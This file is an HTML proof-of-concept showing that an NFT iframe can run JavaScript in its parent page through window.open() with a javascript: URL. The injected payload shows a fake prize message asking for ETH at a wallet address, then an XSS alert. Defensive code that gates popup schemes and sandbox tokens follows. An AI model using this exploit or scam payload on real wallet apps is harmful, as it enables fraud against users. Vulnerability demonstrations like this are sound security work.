dapp.html
<!doctype html>
<html>
<head>
<style>
html {
font-family: sans-serif;
}
h1 {
font-size: 1.4em;
}
</style>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<h1>iframe on <span id="originOutput"></span></h1>
<p>
Tap/click this iframe, which will call window.open() with a javascript: URL that executes in the parent page context.
(Observe the injected HTML in the parent page, and potentially an alert() dialog.)
</p>
<p>This is an NFT shown through an iframe. Due to SOP, NFTs should never get access to the parent domain.</p>
<p><b>IN SOP WE TRUST</b></p>
<img src="https://agentjacker.github.io/kittycat.png">
<script>
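// Show which origin this framed document is running on.
document.getElementById('originOutput').innerText = window.location.origin;
// On any click inside the frame, call window.open() with a javascript: URL (the behaviour under test).
document.body.addEventListener('click', function () {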
window.open('javascript:var elem = document.createElement("p");elem.innerHTML = "<b><marquee>send your eth to 0x983C2d9302a31041bf3E342dDd420DDac122ccb6 to win a prize one time offer</marquee><p>Executed JS in parent origin: "+window.location.origin+"</b></p>"; document.body.append(elem);alert("XSS in doc.domain: "+document.domain+", win.origin: "+window.location.origin)');
});
</script>
</body>
</html>
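
A host-side check for the behaviour this file demonstrates, as an added example that is not part of dapp.html or its repository. It assumes the embedding application gets to approve new-window requests coming from the framed content and controls the iframe's `sandbox` attribute; the function names and the `nft.example` URLs are hypothetical.

```javascript
// Added example: gate new-window requests from untrusted framed content and
// audit the sandbox attribute of the iframe that hosts it.
// All names and sample URLs here are constructed for illustration.

const ALLOWED_SCHEMES = new Set(["https:"]);

// Sandbox tokens that let a framed document open windows or navigate its parent.
const WINDOW_TOKENS = new Set([
  "allow-popups",
  "allow-popups-to-escape-sandbox",
  "allow-top-navigation",
  "allow-top-navigation-by-user-activation",
  "allow-top-navigation-to-custom-protocols",
]);

// Decide whether a URL passed to window.open() by the frame may be honoured.
// Parsing with URL (WHATWG rules) instead of matching a string prefix means
// case changes, leading whitespace and embedded tabs/newlines in the scheme
// are normalised before the allowlist comparison.
function classifyPopupRequest(rawUrl, frameUrl) {
  let parsed;
  try {
    parsed = new URL(rawUrl, frameUrl);
  } catch {
    return { allow: false, reason: "unparseable" };
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return { allow: false, reason: "scheme " + parsed.protocol };
  }
  return { allow: true, reason: "ok", href: parsed.href };
}

// Return the sandbox tokens that would still let the frame reach window.open()
// or top-level navigation. A missing attribute means no sandboxing at all.
function riskySandboxTokens(sandboxAttr) {
  if (sandboxAttr === null || sandboxAttr === undefined) {
    return ["(no sandbox attribute)"];
  }
  return sandboxAttr.toLowerCase().split(/\s+/).filter((t) => WINDOW_TOKENS.has(t));
}

// Constructed sample: the kind of request made by the click handler above.
const frame = "https://nft.example/dapp.html";
for (const u of ["javascript:alert(1)", "/gallery/1"]) {
  console.log(JSON.stringify(u), classifyPopupRequest(u, frame));
}
console.log(riskySandboxTokens("allow-scripts allow-popups"));
```

An iframe whose `sandbox` value yields an empty list from `riskySandboxTokens` cannot open windows at all, so the scheme check is a second layer for hosts that must allow popups.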